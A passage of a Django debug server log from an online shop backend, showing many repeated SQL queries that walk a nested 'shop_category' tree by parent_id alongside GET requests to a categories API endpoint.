"shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:47:58,653 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:47:58,656 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:47:58,658 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:47:58,661 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:47:58,664 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:47:58,670 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:47:58,673 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:47:58,676 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:47:58,680 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:47:58,684 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:47:58,689 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:47:58,693 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:47:58,697 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:47:58,701 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:47:58,705 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:47:58,711 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:47:58,715 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:47:58,719 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:47:58,722 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:47:58,726 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:47:58,729 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:47:58,735 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:47:58,738 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:47:58,742 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:47:58,746 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:47:58,749 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:47:58,755 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:47:58,758 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:47:58,762 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:47:58,766 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:47:58,770 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:47:58,776 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:47:58,781 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:47:58,785 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:47:58,789 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:47:58,793 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:47:58,798 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:47:58,803 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:47:58,807 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:47:58,812 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:47:58,817 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:47:58,821 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:47:58] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:48:01,125 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:48:01,132 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:48:01,135 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 46; args=(46,) DEBUG 2019-12-16 07:48:01,138 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:48:01,143 utils 20136 140506432534272 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:48:01,144 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:48:01,147 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:48:01,150 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:48:01,153 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) [16/Dec/2019 07:48:01] "GET /api/v1/categories/46 HTTP/1.0" 200 184 DEBUG 2019-12-16 07:48:01,155 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:48:01,159 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:48:01,162 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:48:01,164 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:48:01,167 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:48:01,169 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:48:01,171 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:48:01,175 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:48:01,177 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:48:01,179 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:48:01,182 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:48:01,184 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:48:01,188 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:48:01,190 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:48:01,192 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:48:01,195 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM 